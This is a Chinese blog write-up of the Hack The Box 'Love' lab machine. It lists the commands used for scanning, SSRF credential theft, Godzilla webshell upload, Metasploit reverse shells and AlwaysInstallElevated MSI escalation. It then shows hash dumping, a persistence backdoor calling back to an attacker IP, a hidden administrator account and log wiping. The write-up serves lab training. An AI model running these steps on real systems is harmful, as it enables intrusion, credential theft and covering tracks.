Love has been Pwned !

  • A+
所属分类:逆向工程

Love has been Pwned !


信息收集

全端口+服务Love has been Pwned !

梳理攻击面

资产扩充(domain)

  • hosts碰撞:证书泄露的域名

信息扩充(目录)

dirb http://10.10.10.239:80/dirb http://10.10.10.239:5000/dirb http://staging.love.htb/dirb http://love.htb/

漏洞探测(port)

  • 弱口令,枚举猜解:139/445/135/3306

  • nday,黑盒测试:80/5000

漏洞利用(windows)

  • ms17-010

  • cve-2020-0796

nmap -p445 --script smb-vuln-ms17-010 10.10.10.239nmap -p445 --script cve-2020-0796 10.10.10.239

边界突破

  • sqli -> sqlmap -> shell (略)

  • ssrf-> 凭据 ->文件上传 -> shell

http://staging.love.htb/beta.php通过回显SSRF拿到账号密码(略显刻意)

admin/@LoveIsInTheAir!!!! 

Love has been Pwned !

登陆后台

Love has been Pwned !

找到上传点,上Godzilla马

http://love.htb/images/xlove.php

Love has been Pwned !

权限维持

MSF

use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp

Love has been Pwned !

权限提升

错误配置提权-注册表(AlwaysInstallElevated)

注册表alwaysInstallelevated是一个策略设置项,允许低权限用户以system权限运行安装文件。启用此策略后,低权限用户能以system权限来运行恶意的 msi程序。

即当其键值为1时,计算机默认以system权限运行msi程序

查看alwaysinstallelevated键值

# 处于开启状态reg query HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstallerreg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller

上传恶意msi程序到目标环境

upload /home/kali/Desktop/HackTheBox/x.msi c:/xampp/htdocs/omrs/x.msi

静默运行

msiexec /quiet /qn /i x.msi

Love has been Pwned !

成功获取system权限。

凭据获取

run hashdumprun windows/gather/smart_hashdump

Love has been Pwned !


权限维持

启动项后门

# -X 开机自启动# -i 反向连接时间间隔# -r 攻击者的IPrun persistence -X -i 2 -p 4446 -r 10.10.14.90

远程登录

# 截屏screenshot

Love has been Pwned !

# 开启目标机子远程桌面run getgui -erun post/windows/manage/enable_rdp

Love has been Pwned !

如图,3389成功开启Love has been Pwned !

# 新建账户net user xLove 123456 /add# 加入管理员组net localgroup administrators xLove /add

Love has been Pwned !

连过去Love has been Pwned !

痕迹清理

# 关闭远程桌面net user xLove /del # 删除后门账户clearev  # 清楚日志


Love has been Pwned !


本文始发于微信公众号(don9sec):Love has been Pwned !

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: